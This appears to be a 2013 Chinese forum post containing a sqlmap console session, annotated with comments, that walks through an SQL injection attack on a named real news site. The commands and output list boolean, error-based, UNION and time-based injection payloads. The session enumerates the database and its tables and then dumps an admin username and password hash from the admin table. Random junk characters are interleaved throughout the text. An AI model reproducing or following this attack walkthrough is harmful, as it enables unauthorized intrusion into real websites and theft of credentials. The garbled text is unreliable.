D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
$ y8 O0 C- y9 ~3 d/ N! Nms "Mysql" --current-user /* 注解:获取当前用户名称0 ~9 i, u+ d$ h& z8 m
sqlmap/0.9 - automatic SQL injection and database takeover tool
% @" ^) S/ W+ F/ i! m http://sqlmap.sourceforge.net starting at: 16:53:54
9 l, l$ r- j; _0 X4 Z8 j) ?7 L[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 _ O* Z3 g+ H2 d( u. Q) p
session file( i! ?. j2 ^. `
[16:53:54] [INFO] resuming injection data from session file7 q6 S9 k4 J. \9 E
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file; D4 l: h$ ~3 y a# }5 W
[16:53:54] [INFO] testing connection to the target url
5 T1 _7 ?1 u, wsqlmap identified the following injection points with a total of 0 HTTP(s) reque' G6 N. b& ]/ N) \0 Q( p) G0 K
sts:
3 ], i8 Y) m+ L---
3 U/ Z5 ^9 t- q! K% [Place: GET
) P; D& `' I) {( Q3 qParameter: id
1 ^9 G0 u+ {# V* R7 K& v+ Q+ a Type: boolean-based blind
" B1 e" y7 V+ I6 X Title: AND boolean-based blind - WHERE or HAVING clause$ ?: R. Y5 w, Z- x1 M' L
Payload: id=276 AND 799=799
0 n5 x6 g/ ^3 G0 V Type: error-based
. h# A# q2 c7 N+ [: |* u Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+ J2 g9 Y% ^8 v- {- ] Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
- s4 u0 r$ _! f Z2 M! ?, `6 U5 e8 Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
% z( q! Q! \8 K7 N, l' Q; h),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 Y7 ^7 P$ ^1 v* ?$ n% @+ Y: f% d
Type: UNION query- W9 @6 M8 Y7 C9 w5 l; {
Title: MySQL UNION query (NULL) - 1 to 10 columns, w7 m$ ^( z$ _/ n9 f3 u
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
0 o( A% g; {" R( I(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), P9 J6 S ~1 O: B" }
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
& y2 z u4 S- y3 A0 V* T( R/ s Type: AND/OR time-based blind, A7 l4 U" c/ a7 n
Title: MySQL > 5.0.11 AND time-based blind' H- U) ?7 c! _ ^
Payload: id=276 AND SLEEP(5)+ N; n) Y% T7 U) a" A5 k
---5 q: `5 `" P8 G
[16:53:55] [INFO] the back-end DBMS is MySQL7 m8 E* z+ e2 p' ]
web server operating system: Windows% w, g$ P+ L# P! U2 B* {# ]& b9 H
web application technology: Apache 2.2.11, PHP 5.3.0. [2 n6 q2 C( k& d4 k, W
back-end DBMS: MySQL 5.09 |5 I0 z. y/ w8 b; m8 P0 d6 C7 ^9 ~
[16:53:55] [INFO] fetching current user, ?, J, e3 _0 c
current user: 'root@localhost' ( t( _4 W2 |% v$ P) y2 c# N5 \
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
5 a: Y: P3 P- \9 C$ H0 S. w. mtput\www.wepost.com.hk' shutting down at: 16:53:58
( u/ ?/ L+ ? b5 f) b
5 j- |, _6 N5 `8 B* \- a- }: gD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* c! i% o5 \- W' E, s: S( bms "Mysql" --current-db /*当前数据库" e, q( }+ [- ^
sqlmap/0.9 - automatic SQL injection and database takeover tool
6 M& W8 ~8 x$ i' S' v- Z http://sqlmap.sourceforge.net starting at: 16:54:16% l$ H# I2 o( b+ A# q0 s
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
. _5 j$ N$ o, c' u/ [- S: q7 v, Z6 A session file
V/ E) |2 c: A3 m[16:54:16] [INFO] resuming injection data from session file; P+ _ G2 F" P% y! Z7 B' d( [5 _
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file4 z. |/ o* D$ X4 v. @ f* s- `
[16:54:16] [INFO] testing connection to the target url) r/ i9 B, @4 D" R* e$ _4 |
sqlmap identified the following injection points with a total of 0 HTTP(s) reque1 x7 T5 y4 W% [3 T
sts:
# B. J5 ^0 [! |* u. b2 Z" u' r; ]" y+ u ]---1 Y O% z# u" l6 o Z8 [
Place: GET+ ]3 I; t ^1 |% L* A
Parameter: id
, d# h5 Q$ f. H/ i0 T4 y+ K Type: boolean-based blind) \2 O' h0 ]8 F/ Q& C
Title: AND boolean-based blind - WHERE or HAVING clause2 t& m, L1 V1 l7 Y3 S$ c: s
Payload: id=276 AND 799=799
4 T9 m; \; J" s) ] Type: error-based
, h2 m. F+ O o4 G Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, g' n$ l9 l ], y, F1 W e8 \
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 a! q5 ]( B; I- D) i* e5 S0 S
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
$ K4 I( q- @, |3 \5 n0 ~2 N),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). u+ z: E# T, ~
Type: UNION query
5 \ {$ t# l' w5 g+ R: P4 f. Y Title: MySQL UNION query (NULL) - 1 to 10 columns
9 U/ f/ L4 s- t/ S- b) x Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
5 w, u3 v* x# L A(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' R5 \" P4 e5 k, M
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; x0 [$ H& Y9 s9 o& U
Type: AND/OR time-based blind
$ J/ J j! p' S3 a$ A; i0 g Title: MySQL > 5.0.11 AND time-based blind' u; ~2 K G% J ^) K
Payload: id=276 AND SLEEP(5)
; l! C$ A+ w/ f+ S4 @* {/ ?---* M) W$ L1 j4 R) i8 S
[16:54:17] [INFO] the back-end DBMS is MySQL
N/ h- B* ^8 ?. m: s- ]; u3 uweb server operating system: Windows# Q" I G1 @' u9 b
web application technology: Apache 2.2.11, PHP 5.3.0
0 Q2 @6 @% H0 S/ @back-end DBMS: MySQL 5.0
+ a3 {7 d5 Q# }3 p[16:54:17] [INFO] fetching current database5 D a7 r) u' w' D8 j9 [' u
current database: 'wepost'
6 t N8 i }& e3 \' p( U% a2 z[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
. N$ @* }% c- p# A. O6 t* Q" Ctput\www.wepost.com.hk' shutting down at: 16:54:18
0 t r# g ?9 V; BD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 N2 C) G! H: Dms "Mysql" --tables -D "wepost" /*获取当前数据库的表名( Y1 o/ \! j% f5 T+ d+ a
sqlmap/0.9 - automatic SQL injection and database takeover tool8 U" S2 M1 p7 ]: H* L
http://sqlmap.sourceforge.net starting at: 16:55:25- K# t' C y* j/ H; {
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
. w: F1 S$ m: r0 M2 S3 I0 M( v session file ~# \: S- D) c
[16:55:25] [INFO] resuming injection data from session file
, P& C# q+ T$ I5 J6 i8 G+ R9 O! A# q% G[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
4 Y( g+ B8 g, m[16:55:25] [INFO] testing connection to the target url5 A( T5 ]9 ?2 Z( G% F( S. [) z
sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 Q- w/ `7 C2 G7 ~+ C- s% U
sts:
. x% v) q1 H. l' f2 D9 M---
: D+ n! I' L0 b& z2 [2 C, |Place: GET) [- M$ y* j2 t) I5 |. t
Parameter: id
2 D3 `) C) ]1 y3 G Type: boolean-based blind3 _, Z0 o8 w0 l( T7 \8 A" M2 O
Title: AND boolean-based blind - WHERE or HAVING clause
2 U! e2 y" Q! i. h/ k9 W Payload: id=276 AND 799=799+ y3 x/ J" p+ X6 `
Type: error-based# F. u" h4 S' Y7 T
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause% Q$ g* J2 l$ ^% _3 Y7 p
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% k- q4 s" g- F6 D7 ^& x
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58; Y- f4 _* r! W) g- W- ^% S
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)3 r7 k. `$ Z& ~% k9 ]
Type: UNION query
# {( [) t# N8 ^5 w; i6 D+ R' m* c Title: MySQL UNION query (NULL) - 1 to 10 columns
& F$ q& n5 a ^" C8 e9 ~ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR9 f T# i5 j6 Y2 ?8 o
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ E6 {! {! Z( A Y( M7 VCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#$ ^+ R; _$ H# l7 L; p7 {3 _8 V
Type: AND/OR time-based blind! z) X; z$ A6 i( s, d
Title: MySQL > 5.0.11 AND time-based blind. D3 z' C& @! R4 Q5 z+ {: u% r
Payload: id=276 AND SLEEP(5)% I" {/ M" f/ w' s( p
---' {, h. {# x8 R+ K2 r& U
[16:55:26] [INFO] the back-end DBMS is MySQL m' v3 N9 K S+ g7 I& T! |- W' V
web server operating system: Windows
" W7 z( G; k; Y" U, S, Hweb application technology: Apache 2.2.11, PHP 5.3.07 Z. n8 W8 j a
back-end DBMS: MySQL 5.0
J) _& d$ Z3 s: l[16:55:26] [INFO] fetching tables for database 'wepost' q% Z+ }/ d0 z# U6 w. p4 ~+ N
[16:55:27] [INFO] the SQL query used returns 6 entries
! y% U! j/ }4 Z+ CDatabase: wepost# I$ K& P6 X& d
[6 tables]
2 S0 {4 T- J% L1 Q1 j' o5 Z+-------------+: ?4 Q- [6 z) x0 r- q1 |% S
| admin |, U, B `; s* p) r8 d8 M+ w
| article |) {# g4 z' a! X* N
| contributor |+ X, w0 r3 M) Y' W" L8 O& F9 {- K
| idea |3 B- O1 q: u/ A8 @
| image |+ ]7 b. y3 d4 K: @: U6 O5 t8 |
| issue |
5 o* {8 g3 v& i* K/ T9 Q+-------------+' Z9 P5 g7 P( V
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou! f8 [8 F C y& @
tput\www.wepost.com.hk' shutting down at: 16:55:337 L4 {. B3 o6 a
/ h, h5 @: ?4 TD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db8 K- d( {9 n2 `9 i$ j/ m- k
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
) @4 j+ l6 z) ?6 F+ p sqlmap/0.9 - automatic SQL injection and database takeover tool
6 V: P8 d4 m3 l8 F+ k http://sqlmap.sourceforge.net starting at: 16:56:06- d1 O# ? U+ ?$ I% w+ M9 |
sqlmap identified the following injection points with a total of 0 HTTP(s) reque t0 o# D# T( u8 z: j8 [, `
sts:
9 c A$ k4 Z) W9 L. d5 C$ g---
; M& Y& V3 D+ N+ HPlace: GET
/ k4 [& A! m9 EParameter: id' z" ~1 u0 s6 ~& H c% ?
Type: boolean-based blind
& D ^* m- Z: g3 m6 y+ o a8 G& ` Title: AND boolean-based blind - WHERE or HAVING clause. [3 P2 }" b4 ~# Q+ m
Payload: id=276 AND 799=799
' T+ j: Z0 `( t- P: Q Type: error-based1 w @- [- m: G$ k: V5 v1 }% r# ~
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
& {: N/ L3 |/ r J5 Y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,& x7 v* f5 m( C! h
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,580 ^! q1 l5 o3 U& j
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 ?! v$ a& [+ y
Type: UNION query, ^' E) H& w. y; a, d
Title: MySQL UNION query (NULL) - 1 to 10 columns
4 N1 j/ d* J" X: Q( [7 [) W Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 t( P- \# D& `9 ~7 W, ^
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 L9 W1 x8 o; }2 F
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ p) F$ e$ |7 c' p, e
Type: AND/OR time-based blind
9 }% C( B$ {! f3 f) N) R Title: MySQL > 5.0.11 AND time-based blind D$ N: Z4 x- u0 G" N; ~
Payload: id=276 AND SLEEP(5)
1 K4 l5 h# N3 c3 x6 w" t0 Y---
* g5 J/ g/ _- g3 a* N; Tweb server operating system: Windows
5 L$ r' }& z- @' ]9 I" cweb application technology: Apache 2.2.11, PHP 5.3.0+ P4 Z+ @2 D" _$ |( T8 e9 r9 L
back-end DBMS: MySQL 5.0- ~& S- a# s K) _
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se0 M! L3 I' B. J7 w' a5 n/ B# c
ssion': wepost, wepost1 o. Z( l& x7 K. B! n0 x3 w
Database: wepost
& u& [% q4 ]$ p T( P9 lTable: admin: U" h0 d9 m# H* M2 K
[4 columns]# j+ a* R. E8 z5 f$ J$ o3 a# T! k5 c
+----------+-------------+
1 H3 z5 Z0 z, E: A6 `- G5 k. K; t9 O| Column | Type |3 B) U' i4 g$ }5 \
+----------+-------------+* L" R/ E7 h9 o, u% B
| id | int(11) |& c B9 ?4 d. p5 F
| password | varchar(32) |
6 B2 R- ]! n: q# I+ M* Y0 a| type | varchar(10) |4 I5 b j3 R( v/ t7 |& V# F
| userid | varchar(20) |/ \( E' D3 p6 O! o
+----------+-------------+
; R6 ?1 ~: P4 ?5 ~6 O% k' _9 B shutting down at: 16:56:19, [6 ?' L8 g; g
6 c8 ~0 w- J2 A
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db8 n& j: ~: v' N3 j( G1 B) Y% m
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
! m) Y- y1 e& j sqlmap/0.9 - automatic SQL injection and database takeover tool
1 D3 P/ c6 y4 O& B9 ]8 @; ^# \9 j http://sqlmap.sourceforge.net starting at: 16:57:14
$ V* p, I8 d! u/ T- W, P' Osqlmap identified the following injection points with a total of 0 HTTP(s) reque3 P: X( w2 k) r" q \4 R# J
sts:
( w2 f% p1 h4 u1 B- K7 T---2 |+ o1 Y/ V j- K+ n8 U3 Q
Place: GET: t& K( m9 h" E- Q
Parameter: id
: `8 A' o* E7 G. D0 j! j' y7 z$ T' ? Type: boolean-based blind1 @4 H3 b1 C% m& r: o. c" }
Title: AND boolean-based blind - WHERE or HAVING clause
& j6 Y& @$ K! h1 z Payload: id=276 AND 799=7994 n" o' |' B& q
Type: error-based9 g8 X4 u# @! W9 Z" t. f$ @/ m
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause8 ]* w# J5 Q3 z2 \" O. r# z$ g
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 J% Y% ]9 X5 E; p120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ b& L' |/ y( e. K
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
7 r) L/ F9 H. c& F0 B, X; D Type: UNION query
: M2 H0 L5 D6 }: p0 _7 Y) M Title: MySQL UNION query (NULL) - 1 to 10 columns- ]5 D+ n4 O5 H+ g
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
* f' J1 E; K$ A2 o* n, t( W! L(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),4 N* l& X* |3 t5 p* g$ v/ Z1 U
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; x9 k; q3 P" A: M( n" g
Type: AND/OR time-based blind
' q w; u+ s& S& y' f Title: MySQL > 5.0.11 AND time-based blind! L4 V: F4 c4 Z& B; `& ~5 ^
Payload: id=276 AND SLEEP(5)
8 x3 J3 G. @+ G* W% j9 z% E---5 U3 h: u* H( B1 M8 c5 h2 `
web server operating system: Windows* n7 Z* c# y: [6 v$ T" r f( j
web application technology: Apache 2.2.11, PHP 5.3.00 Y: J9 B9 A( Z# `
back-end DBMS: MySQL 5.0
3 ~7 _5 P4 M$ M4 mrecognized possible password hash values. do you want to use dictionary attack o
) R# o, i5 _: b+ L9 `) Un retrieved table items? [Y/n/q] y) F6 M3 m8 p6 p7 R! i& k a
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]! Y' ?, K. m4 ]
do you want to use common password suffixes? (slow!) [y/N] y
" D, Z7 I- Z* S. E0 A6 uDatabase: wepost/ L1 {* H1 I* x8 |( L0 k
Table: admin
, Q; K- L2 \& v: k[1 entry]8 A6 F3 x C' h* ?# m& X$ l
+----------------------------------+------------+# |& h* o0 s; y' s" u- f. _3 c2 [
| password | userid |
( l( F2 \) F4 s5 [! [+----------------------------------+------------+) n( z+ p, F6 X. n, G F
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |" Y2 E( E& ], B4 ` E$ c9 R' m
+----------------------------------+------------+! i; I1 ^: |2 x5 r# N
shutting down at: 16:58:14
x4 B( m# o' q* F7 u) j3 w
# J# z+ T1 p0 h, a$ [# ZD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对